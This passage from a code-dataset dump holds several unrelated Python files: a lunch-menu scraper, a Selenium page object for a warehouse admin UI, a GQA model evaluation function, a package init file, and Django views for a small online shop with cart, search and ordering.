acute\n # menu = menu.replace(\"\",\"Ň\") # Capital N, caron\n menu = menu.replace(\"ň\",\"ň\") # Small n, caron\n # menu = menu.replace(\"\",\"Ó\") # Capital O, acute\n menu = menu.replace(\"ó\",\"ó\") # Small o, acute\n # menu = menu.replace(\"\",\"Ř\") # Capital R, caron\n menu = menu.replace(\"Å™\",\"ř\") # Small r, caron\n menu = menu.replace(\"Å \",\"Š\") # Capital S, caron\n menu = menu.replace(\"Å¡\",\"š\") # Small s, caron\n # menu = menu.replace(\"\",\"Ť\") # Capital T, caron\n # menu = menu.replace(\"\",\"ť\") # Small t, caron\n # menu = menu.replace(\"\",\"Ú\") # Capital U, acute\n menu = menu.replace(\"ů\",\"ú\") # Small u, acute\n # menu = menu.replace(\"\",\"Ů\") # Capital U, ring\n # menu = menu.replace(\"\",\"ů\") # Small u, ring\n # menu = menu.replace(\"\",\"Ý\") # Capital Y, acute\n menu = menu.replace(\"ý\",\"ý\") # Small y, acute\n # menu = menu.replace(\"\",\"Ž\") # Capital Z, caron\n menu = menu.replace(\"ž\",\"ž\") # Small z, caron\n\n # Replace useless day info with restaurant type\n menu = re.sub(r\"

      .*\\d{4}

      \", \"

      Kanas Restaurace

      \", menu, count=2)\n menu = re.sub(r\"

      .*\\d{4}

      \", \"

      Kanas Cafeteria

      \", menu)\n\n return menu\n\n# Head of the HTML file that contains all usual cruft plus link to lunch.css\n# lunch.css modifies some of the CSS from the scraped content\nbody = ''\n\n# Div with a link to Google Translate for the English translation\nbody += ''\n\n# Add content from all restaurants\nbody += '

      Rebio

      ' + scrapeRebio()\nbody += '

      Kotelna

      ' + scrapeLunchTime(lunchtime[\"kotelna\"])\n#DISABLE temporarily###body += '

      Paladeo

      ' + scrapeLunchTime(lunchtime[\"paladeo\"])\nbody += scrapeKanas()\n\n# Tail of the HTML\nbody += ''\n\n# Write to the lunch file in httpd's document root\nwith open(\"/var/www/html/lunch\", \"w\") as html_file:\n html_file.write(body)\n","sub_path":"scrape_my_lunch.py","file_name":"scrape_my_lunch.py","file_ext":"py","file_size_in_byte":5779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"234194335","text":"#encoding=utf-8\n\nfrom app_object.base import Base\nfrom common import LogManage\n\nclass WareHouseInfoBase(Base.Base):\n u\"\"\"仓库信息原子操作\"\"\"\n def switch_to_iframe(self):\n u\"\"\"切换进仓库信息页签的iframe\"\"\"\n self.switch_to_iframe_by_titlename(\"仓库信息\")\n\n def select_warehouse_ckbox(self, name):\n u\"\"\"根据仓库名称勾选仓库\"\"\"\n xpath = \"//td[@aria-describedby='defaultTable_warehouse_name' and text()='\" + name + \"']/preceding-sibling::td/input\"\n self.click_element(self.get_element_by_xpath(xpath))\n\n def is_enabled_of_warehouse(self, name):\n u\"\"\"获取仓库是否启用状态\"\"\"\n xpath = \"//td[@aria-describedby='defaultTable_warehouse_name' and text()='\" + name + \"']/following-sibling::td[@aria-describedby='defaultTable_is_enabled']\"\n is_enable = self.get_element_by_xpath(xpath)\n result = is_enable.text\n if result == u'是':\n return True\n elif result == u'否':\n return False\n else:\n return -1\n\n def click_edit_btn_of_warehouse(self, name):\n u\"\"\"点击指定仓库上的编辑按钮\"\"\"\n edit = u'编辑'\n xpath = \"//td[@aria-describedby='defaultTable_warehouse_name' and text()='\" + name + \"']/preceding-sibling::td/a[@title='\" + edit + \"']\"\n self.click_element(self.get_element_by_xpath(xpath))\n\n def click_delete_btn_of_warehouse(self, name):\n u\"\"\"点击指定仓库上的删除按钮\"\"\"\n edit = u'编辑'\n xpath = \"//td[@aria-describedby='defaultTable_warehouse_name' and text()='\" + name + \"']/preceding-sibling::td/a[@title='\" + edit + \"']/following-sibling::*[1]\"\n LogManage.info(xpath)\n self.click_element(self.get_element_by_xpath(xpath))\n","sub_path":"app_task/basefiles/warehouseinfo/WareHouseInfoBase.py","file_name":"WareHouseInfoBase.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"446474318","text":"\n\ndef test(dataset_questions_path, features_path, BATCH_SIZE,\n lstm, rn, criterion, questions_dictionary, answers_dictionary, device,\n MAX_QUESTION_LENGTH, isObjectFeatures, OBJECT_TRIM=\"default\"):\n\n val_loss = 0.\n val_accuracy = 0.\n\n set_eval_mode(rn)\n set_eval_mode(lstm)\n\n with torch.no_grad():\n\n dataset_size_remain = get_size(dataset_questions_path)\n\n print(\"Testing\")\n batch = get_batch(dataset_questions_path, features_path, BATCH_SIZE,\n device, isObjectFeatures, categoryBatch=True, OBJECT_TRIM=OBJECT_TRIM)\n\n groups = {}\n groups_acc = []\n types = {\"semantic\": {},\n \"detailed\": {},\n \"structural\": {}\n }\n semantic_acc = []\n structural_acc = []\n detailed_acc = []\n\n #pbar = tqdm(total=num_batch)\n batch_number = 0\n while dataset_size_remain > 0:\n\n # Get batch\n\n if dataset_size_remain < BATCH_SIZE:\n break\n dataset_size_remain -= BATCH_SIZE\n\n #question_batch, answer_ground_truth_batch, object_features_batch, objectsNum_batch = next(batch)\n question_batch, answer_ground_truth_batch, object_features_batch, category_batch = next(\n batch)\n\n h_q = lstm.reset_hidden_state()\n\n question_batch, answer_ground_truth_batch = vectorize_gqa(question_batch, answer_ground_truth_batch,\n questions_dictionary, answers_dictionary,\n BATCH_SIZE, device, MAX_QUESTION_LENGTH)\n\n ## Pass question through LSTM\n question_emb_batch, h_q = lstm.process_question(\n question_batch, h_q)\n question_emb_batch = question_emb_batch[:, -1]\n\n ## Pass question emb and object features to the Relation Network\n rr = rn(object_features_batch, question_emb_batch)\n\n loss = criterion(rr, answer_ground_truth_batch)\n val_loss += loss.item()\n\n correct, _, correct_answers = get_answer(\n rr, answer_ground_truth_batch, answers_dictionary, return_answer=True)\n val_accuracy += correct\n\n \"\"\"\n Structure:\n groups -> {\n \"group_name1\": (100, 200), -> This means 200 question were tested and 100 were correct, giving 50% accuracy\n \"group_name2\": (20, 30),\n \"group_name3\": (5, 8)\n }\n \n types -> {\n \"structural\": {\n \"struct1\": (20, 30), -> same structure as the one on groups\n \"struct2\": (10, 15),\n },\n \"semantic\": {}, -> they might be empty (so might \"groups\")\n \"detailed\": {\n \"det1\": (1, 4),\n \"det2\": (30, 45)\n }\n }\n \"\"\"\n\n # Obtain results for each group and type\n for question, correct_answer in zip(category_batch, correct_answers):\n\n group = question[\"group\"] # e.g. -> all color questions\n if group is not None:\n group_rights, group_total = groups.get(\n group, (0, 0)) # groups[group] = (0,0)\n groups[group] = (\n group_rights + correct_answer, group_total + 1)\n else:\n group_rights, group_total = groups.get(\"None\", (0, 0))\n groups[\"None\"] = (\n group_rights + correct_answer, group_total + 1)\n\n # -> e.g. semantic, detailed, structural\n for typ in question[\"types\"]:\n type_category = question[\"types\"][typ] # -> e.g. query\n if type_category is not None:\n category_rights, category_total = types[typ].get(\n type_category, (0, 0))\n types[typ][type_category] = (\n category_rights + correct_answer, category_total + 1)\n else:\n category_rights, category_total = types[typ].get(\n \"None\", (0, 0))\n types[typ][\"None\"] = (\n category_rights + correct_answer, category_total + 1)\n\n batch_number += 1\n #pbar.update()\n\n print(f\"Accuracy seperated by group\")\n for group in groups:\n rights, total = groups[group]\n groups_acc.append([group, 100*rights/total])\n print(\n f\"Group: {group} -> {rights}/{total} gives us {100*rights/total}% \")\n write_csv(groups_acc, \"group_accuracy\")\n\n print(\"___________________________________\")\n\n print(f\"Accuracy seperated by types\")\n for typ in types:\n print(f\"Type: {typ}\")\n current_type = types[typ]\n for category in current_type:\n rights, total = current_type[category]\n print(\n f\"Category: {category} -> {rights}/{total} gives us {100*rights/total}% \")\n print(\"___________________________________\")\n\n for category in types[\"semantic\"]:\n rights, total = types[\"semantic\"][category]\n semantic_acc.append([category, 100*rights/total])\n write_csv(semantic_acc, \"semantic_accuracy\")\n\n for category in types[\"structural\"]:\n rights, total = types[\"structural\"][category]\n structural_acc.append([category, 100*rights/total])\n write_csv(structural_acc, \"structural_accuracy\")\n\n for category in types[\"detailed\"]:\n rights, total = types[\"detailed\"][category]\n detailed_acc.append([category, 100*rights/total])\n write_csv(detailed_acc, \"detailed_accuracy\")\n\n #pbar.close()\n\n val_accuracy /= float(batch_number)\n val_loss /= float(batch_number)\n\n return val_loss, val_accuracy\n","sub_path":"revisando_testing_func.py","file_name":"revisando_testing_func.py","file_ext":"py","file_size_in_byte":6215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"8527346","text":"\n\"\"\" What we write here will end up in tha package __doc__\n Initialisation file for Package: iso3166_ext\n from: EC-software \"\"\"\n\nimport os # Needed for definition of root_dir\nfrom iso3166_ext.world import Territories # import this module on package import\n\n# The names: 'countries' and 'get' makes the module compatible with https://pypi.org/project/iso3166/\ncountries = world.Territories\nget = countries.get\n\n__version__ = \"0.0.3\" # Version of the iso3166_ext package\n__all__ = [get] # import these modules on package import *\n\n# The root path of this package, for later reference, I think ...\nroot_dir = os.path.dirname(os.path.realpath(__file__))\n\n","sub_path":"iso3166_ext/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"353579201","text":"\"\"\"\nThe module manages shops.\n\t\n\"\"\"\n\nfrom dargent.views import TemplateView, LoginStateView, BackOffsetView\nfrom dargent.products.models import Product, ProductCategory, Producer, Country\nfrom dargent.productprops.models import ShopProductCategory, ShopProducer, ShopCountry\nfrom dargent.items import ItemPage\nfrom django.utils import simplejson\nfrom shops.forms import SearchProductForm, IntegerEmptyStringField\nfrom dargent.utils import Cart, Search, Location, get_db_key_from_choices\nfrom django.shortcuts import redirect\nfrom django.forms.formsets import formset_factory\nfrom orders.forms import OrderProductCountForm, OrderDetailForm\nfrom orders.models import OrderProductCount, OrderDetail\nfrom dargent.utils import DictSessionManager, get_shop_location\nfrom dargent.settings import SITE_URL, ORDER_EMAIL_SUBJECT\nfrom dargent.templateemail import TemplateEmail\t\nfrom shops.models import Shop, ShopFace\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom dargent.utils import get_shop_name\nfrom dargent.orders.models import OrderDetail\nfrom dargent.utils import OrderDetail as OrderDetailInSession, ShopGetter, get_field_list_from_meta, get_sorted_by_name\nfrom dargent.settings import DOMAIN\nfrom utils import get_shop_id_by_name, get_shop_by_name, assert_user_shop\nfrom settings import MEDIA_URL\nfrom django.contrib.auth.models import User\nfrom userprofiles.models import UserProfile\nfrom dargent.settings import NUM_ITEMS_ON_PAGE\nfrom django.forms import IntegerField, CharField\nfrom copy import copy\nfrom orders.models import OrderDetail, OrderProductCount\nfrom dargent.specialpages.views import page403Or404\nfrom dargent.home.models import MenuNotifications, MENU_NOTIFICATIONS_CHOICES\n\nimport dargent.utils as utils\n\nfrom datetime import datetime\n\ndef shopbase( cls ):\n\t\"\"\"\n\tBase view for shops: retrieve shops properties such as background, fonts, etc.\n\t\"\"\"\n\tdef _pre_view( self_obj, request, shop_name, *args, **kwargs ):\n\t\tself_obj._shop = get_shop_by_name( request.session, shop_name )\n\t\tif self_obj._shop.is_removed:\n\t\t\treturn page403Or404( request )\n\t\tself_obj._shop_face = ShopFace.objects.get( shop = self_obj._shop )\n\t\tself_obj._shop_id = get_shop_id_by_name( request.session, shop_name )\n\t\treturn super( cls, self_obj ).pre_view( request, shop_name, *args, **kwargs )\n\n\tdef _view( self_obj, request, shop_name, dictionary = {} ):\n\t\tuser = get_shop_by_name( request.session, shop_name ).user\n\t\td = {\t\n\t\t\t\t'background': self_obj._shop_face.get_background(),\n\t\t\t\t'product_bk_color': self_obj._shop_face.product_bk_color,\n\t\t\t\t'product_text_color': self_obj._shop_face.product_text_color,\n\t\t\t\t'menu_bk_color': self_obj._shop_face.menu_bk_color,\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t'menu_text_color': self_obj._shop_face.menu_text_color,\n\t\t\t\t'user_text_color': self_obj._shop_face.user_text_color,\n\t\t\t\t'domain_shop_name': get_shop_name( request ),\n\t\t\t\t'user_username': user.username,\n\t\t\t\t'user_first_name': user.first_name,\n\t\t\t\t'user_last_name': user.last_name }\n\t\ttry:\t\n\t\t\towner_profile = UserProfile.objects.get( user = user )\n\t\texcept ObjectDoesNotExist:\n\t\t\td.update( has_user_profile = False )\n\t\telse:\n\t\t\tuser_image = owner_profile.image.url\n\t\t\td.update( user_profile = owner_profile )\n\t\t\td.update( has_user_profile = True )\n\t\td.update( dictionary )\n\t\treturn super( cls, self_obj ).view( request, d )\n\tsetattr( cls, 'pre_view', _pre_view )\n\tsetattr( cls, 'view', _view )\n\treturn cls\n\n@shopbase\nclass ShopBaseView( TemplateView ):\n\t\"\"\"\n\tFor pages which don't that we don't support 'back' click in a browser\n\t\"\"\"\n\tpass\n\n@shopbase\nclass BackOffsetShopBaseView( BackOffsetView ):\n\t\"\"\"\n\tFor pages which do support 'back' click in a browser\n\t\"\"\"\n\tpass\n\nclass OrderTemplateEmail( TemplateEmail ):\n\t\"\"\"\n\tClass is using to send email about order\n\t\"\"\"\n\tTEMPLATE = \"shops-email-new-order.html\"\n\tSUBJECT = ORDER_EMAIL_SUBJECT\n\t\t\nclass GoToOrderView( ShopBaseView ):\n\t\"\"\"\n\tThe view with a formset for the order.\t\n\t\"\"\"\n\tTEMPLATE = 'shops-go-to-order.html'\n\n\tOPC_FORM_PREFIX = 'order_product_count_form'\n\t\n\tdef view( self, request, shop_name ):\n\n\t\tcart = Cart( request.session )\n\n\t\tproducts = cart.get()\n\t\tproducts_as_list = cart.as_list()\n\t\tnum_products = len( products )\n\n\t\tdelivery_cost = Shop.objects.get( name = shop_name ).delivery_cost\n\n\t\torder_sum = utils.calc_order_sum( products_as_list, delivery_cost )\n\t\tOrderProductCountFormset = formset_factory( OrderProductCountForm )\n\t\n\t\tif request.method == 'POST':\n\t\t\torder_product_count_formset = OrderProductCountFormset( request.POST, prefix = GoToOrderView.OPC_FORM_PREFIX )\t\t\n\t\t\torder_detail_form = OrderDetailForm( request.POST )\n\n\t\t\tif order_product_count_formset.is_valid() and order_detail_form.is_valid():\n\t\t\t\t#order_detail_form.save()\n\t\t\t\t\n\t\t\t\torder_detail = OrderDetail()\n\t\t\t\taddress = order_detail_form.cleaned_data[ 'address' ]\n\t\t\t\tphone = order_detail_form.cleaned_data[ 'phone' ]\n\t\t\t\tname_surname = order_detail_form.cleaned_data[ 'name_surname' ]\n\t\t\t\torder_detail.address = address\n\t\t\t\torder_detail.phone = phone\n\t\t\t\torder_detail.name_surname = name_surname\n\t\t\t\torder_detail.shop = Shop.objects.get( id = self._shop_id )\n\t\t\t\torder_detail.save()\n\n\t\t\t\torder_detail_in_session = OrderDetailInSession( request.session )\n\n\t\t\t\torder_detail_in_session.set(\tname_surname = name_surname,\n\t\t\t\t\t\t\t\t\t\t\t\tphone = phone,\n\t\t\t\t\t\t\t\t\t\t\t\taddress = address,\n\t\t\t\t\t\t\t\t\t\t\t\torder_time = datetime.now(),\n\t\t\t\t\t\t\t\t\t\t\t\tdelivery_cost = delivery_cost )\n\t\t\t\tcart.empty( commit = False )\n\n\t\t\t\tfor form in order_product_count_formset.forms:\n\t\t\t\t\torder_product_count = OrderProductCount()\n\t\t\t\t\tcount = form.cleaned_data[ 'count' ]\n\t\t\t\t\torder_product_count.count = count\n\t\t\t\t\torder_product_count.order_detail = order_detail\n\t\t\t\t\tproduct = form.cleaned_data[ 'product' ]\n\t\t\t\t\torder_product_count.product = product\n\t\t\t\t\torder_product_count.save()\t\t\t\t\t\t\t\t\t\n\t\t\t\t\tcart.add_item(\tproduct_id = product.id, \n\t\t\t\t\t\t\t\t\tname = product.name, \n\t\t\t\t\t\t\t\t\tdescription = product.description,\n\t\t\t\t\t\t\t\t\tprice = product.price,\n\t\t\t\t\t\t\t\t\tthumbnail_url = product.thumbnail_url,\n\t\t\t\t\t\t\t\t\tcount = count,\n\t\t\t\t\t\t\t\t\tcommit = False )\n\n\t\t\t\tcart.commit()\n\t\t\t\t\n\t\t\t\tshop_name = get_shop_name( request )\n\n\t\t\t\tuser = get_shop_by_name( request.session, shop_name ).user\n\t\t\t\t\n\t\t\t\temail = user.email\n\t\t\t\tOrderTemplateEmail(\tfrom_email = \"robot@{0}\".format( DOMAIN ), \n\t\t\t\t\t\t\t\t\temail_list = [ email, \"sergzach@gmail.com\" ] \\\n\t\t\t\t\t\t\t\t\t).send( { 'shop_name': shop_name, 'domain': DOMAIN, 'sum': str( order_sum ), 'products': products, 'order_id': order_detail.id } )\n\n\t\t\t\t# increment 'my orders' menu notification\n\t\t\t\tMenuNotifications.inc( user = user, notification = 'my_orders' )\n\n\t\t\t\treturn self._redirect( 'http://{0}.{1}/order-completed/'.format( shop_name, DOMAIN ) )\n\t\telse:\n\t\t\topc_formset_data = {\n\t\t\t\tGoToOrderView.OPC_FORM_PREFIX + '-TOTAL_FORMS': unicode( num_products ),\n\t\t\t\tGoToOrderView.OPC_FORM_PREFIX + '-INITIAL_FORMS': u\"0\",\n\t\t\t\tGoToOrderView.OPC_FORM_PREFIX + '-MAX_NUM_FORMS': u\"\"\n\t\t\t}\n\n\t\t\tfor i in range( 0, num_products ):\n\t\t\t\topc_formset_data.update( { GoToOrderView.OPC_FORM_PREFIX + '-' + str( i ) + '-' + 'count': products[ i ][ 1 ][ 'count' ] } )\n\t\t\t\t\n\t\t\torder_product_count_formset = OrderProductCountFormset(\topc_formset_data, prefix = GoToOrderView.OPC_FORM_PREFIX )\n\n\t\t\torder_detail_form = OrderDetailForm( initial = utils.OrderDetail( request.session ).get_default() )\n\n\t\tproducts_and_count_forms = []\n\t\topc_forms = order_product_count_formset.forms\n\t\tfor i in range( 0, len( opc_forms ) ):\n\t\t\tproducts_and_count_forms.append( ( products[ i ], opc_forms[ i ] ) )\n\t\n\t\treturn super( GoToOrderView, self ).view( request, shop_name,\n\t\t\t\t\t\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\t\t\t\t\t\t'products_and_count_forms': products_and_count_forms, \n\t\t\t\t\t\t\t\t\t\t\t\t\t'num_products_in_cart': num_products, \n\t\t\t\t\t\t\t\t\t\t\t\t\t'order_sum': order_sum,\n\t\t\t\t\t\t\t\t\t\t\t\t\t'order_product_count_formset': order_product_count_formset,\n\t\t\t\t\t\t\t\t\t\t\t\t\t'order_detail_form': order_detail_form,\n\t\t\t\t\t\t\t\t\t\t\t\t\t'delivery_cost': delivery_cost } )\n\nclass OrderCompletedView( ShopBaseView ):\n\t\"\"\"\n\tDisplays a message to a user that the order is completed.\n\tAlso displays a message about order sum, customer name, address, etc.\n\t\"\"\"\n\tTEMPLATE = \"shops-order-completed.html\"\n\n\tdef view( self, request, shop_name ):\n\n\t\tcart = Cart( request.session )\n\n\t\torder_detail_in_session = utils.OrderDetail( request.session )\n\t\torder_detail = order_detail_in_session.get()\n\n\t\tdelivery_cost = order_detail[ 'delivery_cost' ]\n\n\t\tproducts = copy( cart.as_list() )\n\t\tcart.empty()\n\n\t\torder_sum = utils.calc_order_sum( products, delivery_cost )\n\t\t\n\t\treturn super( OrderCompletedView, self ).view(\trequest, shop_name,\n\t\t\t\t\t\t\t\t\t\t\t{\t'name_surname': order_detail[ 'name_surname' ],\n\t\t\t\t\t\t\t\t\t\t\t\t'phone': order_detail[ 'phone' ],\n\t\t\t\t\t\t\t\t\t\t\t\t'address': order_detail[ 'address' ],\n\t\t\t\t\t\t\t\t\t\t\t\t'delivery_cost': delivery_cost,\n\t\t\t\t\t\t\t\t\t\t\t\t'order_time': order_detail[ 'order_time' ],\n\t\t\t\t\t\t\t\t\t\t\t\t'products': products,\n\t\t\t\t\t\t\t\t\t\t\t\t'order_sum': order_sum\n\t\t\t\t\t\t\t\t\t\t\t} )\n\nclass CartView( BackOffsetShopBaseView ):\n\t\"\"\"\n\tIt displays products in the cart.\n\t\"\"\"\n\tTEMPLATE = 'shops-cart.html'\n\n\tdef view( self, request, shop_name ):\n\t\tLocation( request.session, 'shop' ).set( get_shop_location( shop_name, 'cart', request.GET ) )\n\t\treq = request.REQUEST\n\t\tcart = Cart( request.session )\n\t\tif request.method == 'POST':\n\t\t\tcart.remove_item( req[ 'product_id' ] )\n\n\t\tpage = int( req[ 'page' ] ) if 'page' in req else 1\n\t\tdelivery_cost = get_shop_by_name( request.session, shop_name ).delivery_cost\n\n\t\tpage_products = ItemPage.get_by_items_list( items_list = cart.get(), page = page )\n\n\t\treturn super( CartView, self ).view( request, shop_name,\n\t\t\t\t\t\t\t\t\t\t\t\t{\t'page_products': page_products,\n\t\t\t\t\t\t\t\t\t\t\t\t\t'is_cart_empty': len( page_products[ 'object_list' ] ) == 0,\n\t\t\t\t\t\t\t\t\t\t\t\t\t'page': int( page ),\n\t\t\t\t\t\t\t\t\t\t\t\t\t'num_products_on_page': NUM_ITEMS_ON_PAGE,\n\t\t\t\t\t\t\t\t\t\t\t\t\t'sum': cart.get_sum_price() + delivery_cost\n\t\t\t\t\t\t\t\t\t\t\t\t} )\n\n\nclass SearchView( BackOffsetShopBaseView ):\n\t\"\"\"\n\tA view with search on products\n\t\"\"\"\n\tTEMPLATE = \"shops-search.html\"\n\t\t\n\t@staticmethod\n\tdef _remove_key_if( d, key, val ):\n\t\tif d[ key ] == val:\n\t\t\tdel d[ key ]\n\t\n\t@staticmethod\n\tdef _remove_key_if_empty_str( d, key ):\n\t\tSearchView._remove_key_if( d, key, \"\" )\n\n\t@staticmethod\n\tdef _remove_key_if_0( d, key ):\t\t\n\t\tSearchView._remove_key_if( d, key, 0 )\n\n\t@staticmethod\n\tdef _removed_empty_items( form, q_dict ):\n\t\tresult = copy( q_dict )\n\t\tfor field_name in form.fields.iterkeys():\n\t\t\tfield = form.fields[ field_name ]\t\t\t\t\t\n\t\t\tif issubclass( type( field ), IntegerEmptyStringField ):\t\t\t\t\t\n\t\t\t\tSearchView._remove_key_if_empty_str( result, field_name )\t\t\t\t\t\t\n\t\t\telif issubclass( type( field ), IntegerField ):\n\t\t\t\tSearchView._remove_key_if_0( result, field_name )\n\t\treturn result\n\t\n\tdef view( self, request, shop_name, dictionary = {} ):\t\t\n\t\tcart = Cart( request.session )\t\t\n\n\t\treq = request.REQUEST\n\t\tLocation( request.session, 'shop' ).set( get_shop_location( shop_name, 'search', request.GET ) )\n\n\t\tsearch = Search( request.session )\n\t\tsearch_is_set = search.is_set()\n\t\t\n\t\td = {\t'categories': get_sorted_by_name( get_field_list_from_meta( 'product_category', ShopProductCategory, 'shop', self._shop_id ) ),\t\t\t\t\t\n\t\t\t\t'producers': get_sorted_by_name( get_field_list_from_meta( 'producer', ShopProducer, 'shop', self._shop_id ) ),\n\t\t\t\t'countries': get_sorted_by_name( get_field_list_from_meta( 'country', ShopCountry, 'shop', self._shop_id ) ),\n\t\t\t\t'search_is_set': search_is_set\n\t\t}\n\n\t\tq_dict = { 'shop': self._shop_id }\n\n\t\tif request.method == 'POST':\n\t\t\tform = SearchProductForm( request.POST )\n\t\t\tfields = dict( [ ( key, request.POST[ key ] ) for key in form.fields.iterkeys() ] )\n\t\t\tif form.is_valid():\n\t\t\t\td.update( is_valid = True )\n\t\t\t\tq_dict.update( form.cleaned_data )\n\t\t\t\tsearch.set( **q_dict )\t\t\t\t\n\t\t\t\tshop = get_shop_by_name( request.session, shop_name )\n\t\t\t\tpage_products = ItemPage( Product ).get( q_dict = SearchView._removed_empty_items( form, q_dict ), page = 1 )\n\t\t\t\td.update( page = 1 )\n\t\t\telse:\n\t\t\t\td.update( is_valid = False )\n\t\t\t\tpage_products = None\n\t\telse:\n\t\t\tform = SearchProductForm()\n\n\t\t\tis_page = 'page' in req\n\t\t\tpage = int( req[ 'page' ] ) if is_page else 1\t\t\n\t\t\td.update( page = page )\n\n\t\t\tif search.is_set():\n\t\t\t\tfields = search.get()\n\t\t\t\tif is_page:\n\t\t\t\t\tfields.update( shop = self._shop_id )\n\t\t\t\t\tpage_products = ItemPage( Product ).get( q_dict = SearchView._removed_empty_items( form, search.get() ), page = page )\n\t\t\t\telse:\n\t\t\t\t\tpage_products = None\n\t\t\telse:\n\t\t\t\tfields = dict( [ ( key, form.fields[ key ].initial ) for key in form.fields.iterkeys() ] )\n\t\t\t\tpage_products = None\t\t\n\t\t\t\t\n\t\tif page_products:\n\t\t\tcart.add_in_cart_attr( page_products[ 'object_list' ] )\n\n\t\td.update( page_products = page_products )\n\t\t\n\t\td.update( form = form )\n\t\td.update( fields = fields )\n\n\t\td.update( dictionary )\n\t\t\n\t\treturn super( SearchView, self ).view( request, shop_name, d )\n\nclass ShopView( ShopBaseView ):\n\t\"\"\"\n\tA main shop view, displays products in the shop and state of a cart\n\t\"\"\"\n\tTEMPLATE = 'shops-index.html'\n\t \n\tdef view( self, request, shop_name ):\n\t\tLocation( request.session, 'shop' ).set( get_shop_location( shop_name, '', request.GET ) )\n\t\treq = request.REQUEST\n\t\tform_request = None\n\t\tpage = int( req[ 'page' ] ) if 'page' in req else 1\t\n\n\t\tq_dict = {}\n\t\tq_dict.update( shop = self._shop_id )\n\t\t\n\t\tif 'category' in req:\n\t\t\tcategory = int( req[ 'category' ] )\n\t\t\tq_dict.update( category = category )\n\t\telse:\n\t\t\tcategory = None\n\t\t\n\t\tpage_products = ItemPage( Product ).get( q_dict = q_dict, page = page )\n\t\t\n\t\tcart = Cart( request.session )\n\t\tcart.add_in_cart_attr( page_products[ 'object_list' ] )\n\n\t\treturn super( ShopView, self ).view( request, shop_name,\n\t\t\t\t\t\t\t\t\t\t\t\t{\t'page_products': page_products,\n\t\t\t\t\t\t\t\t\t\t\t\t\t'page': int( page ),\n\t\t\t\t\t\t\t\t\t\t\t\t\t'num_products_on_page': NUM_ITEMS_ON_PAGE,\n\t\t\t\t\t\t\t\t\t\t\t\t\t'categories': get_sorted_by_name( get_field_list_from_meta( 'product_category', ShopProductCategory, 'shop', self._shop_id ) ),\n\t\t\t\t\t\t\t\t\t\t\t\t\t'category': category\n\t\t\t\t\t\t\t\t\t\t\t\t} )\n\nclass GoToOrdersOrToAdminView( ShopBaseView ):\n\t\"\"\"\n\tA view with 2 links - 'go-to-admin' or 'go-to-custom-order'\n\t\"\"\"\n\tTEMPLATE = \"shops-go-to-orders-or-to-admin.html\"\n\t\n\tdef view( self, request, shop_name ):\n\t\tsuper( GoToOrdersOrToAdminView, self ).view( request, shop_name )\n\nclass AboutView( ShopBaseView ):\n\t\"\"\"\n\t'About project' view\n\t\"\"\"\n\tTEMPLATE = \"shops-about.html\"\n\tdef view( self, request, shop_name ):\n\t\td = { 'delivery_cost': DELIVERY_COST }\n\t\treturn super( AboutView, self ).view( request, shop_name, d )\n\ndef _shops_list_view( inst, parent, request, d, user ):\n\t\"\"\"\n\tTo display a list of shops by several conditions\n\t\"\"\"\n\tq_dict = d[ 'q_dict' ]\n\treq = request.REQUEST\n\tpage = int( req[ 'page' ] ) if 'page' in req else 1\t\t\n\tshop_page = ItemPage( Shop )\n\tpage_shops = shop_page.get( q_dict = q_dict, page = page )\n\tdel d[ 'q_dict' ]\n\td.update( { 'page_shops': page_shops, 'page': page, 'user2': user } )\n\treturn parent.view( request, d )\n\nclass ShopsListView( TemplateView ):\n\tdef view( self, request, q_dict, user ):\n\t\treturn _shops_list_view( self, super( ShopsListView, self ), request, q_dict, user )\n\nclass LoginStateShopsListView( LoginStateView ):\n\tdef view( self, request, d, user ):\n\t\treturn _shops_list_view( self, super( LoginStateShopsListView, self ), request, d, user )\t\t\t\n \nclass ListByUserView( ShopsListView ):\n\t\"\"\"\n\t\tTo display shops by user with a username\n\t\"\"\"\n\tTEMPLATE = \"shops-list-by-user.html\"\n\n\tdef view( self, request, username ):\n\t\ttry:\n\t\t\treturn super( ListByUserView, self ).view( request, User.objects.get( username = username ) )\n\t\texcept User.DoesNotExist:\n\t\t\treturn super( ListByUserView, self ).view_no_shops( request )\n\nclass ListMyView( LoginStateShopsListView ):\n\t\"\"\"\n\tIt displays all shops by a current user - active or removed\n\t\"\"\"\n\tTEMPLATE = \"shops-list-my.html\"\n\n\tdef view( self, request ):\n\t\tq_dict = { 'user': request.user }\n\t\tif 'opt' in request.REQUEST:\n\t\t\topt = request.REQUEST[ 'opt' ]\n\t\telse:\n\t\t\topt = 'active'\n\n\t\tif opt == 'active':\n\t\t\tq_dict.update( is_removed = False )\n\t\telif opt == 'removed':\n\t\t\tq_dict.update( is_removed = True )\t\t\t\n\t\treturn super( ListMyView, self ).view( request, { 'q_dict': q_dict, 'opt': opt }, request.user )\n\nclass ListView( TemplateView ):\n\t\"\"\"\n\tDisplays all shops which are not removed\n\t\"\"\"\n\tTEMPLATE = 'shops-list.html'\n\n\tdef _get_query_dict( self ):\n\t\treturn {}\n\n\tdef view( self, request ):\n\t\treq = request.REQUEST\n\t\tpage = int( req[ 'page' ] ) if 'page' in req else 1\n\t\t\n\t\tshop_page = ItemPage( Shop )\n\t\tpage_shops = shop_page.get( q_dict = { 'is_removed': False }, page = page )\n\n\t\treturn super( ListView, self ).view( request, { 'page_shops': page_shops, 'page': page } )\n\nclass ProductView( BackOffsetShopBaseView ):\n\t\"\"\"\n\tA view of a custom product.\n\t\"\"\"\n\tTEMPLATE = \"shops-product.html\"\n\n\tdef view( self, request, shop_name, product_id ):\n\t\treq_get = request.GET\t\t\n\t\tproduct = Product.objects.get( id = int( product_id ) )\n\t\tshop_id = get_shop_id_by_name( request.session, shop_name )\n\n\t\tif product.shop.id != shop_id:\n\t\t\traise ProductNotInThisShopError( \"Product with id {0} not found in shop {1}\".format( product_id, self._shop_name ) )\t\t\n\t\tcart = Cart( request.session)\n\t\tin_cart = str( 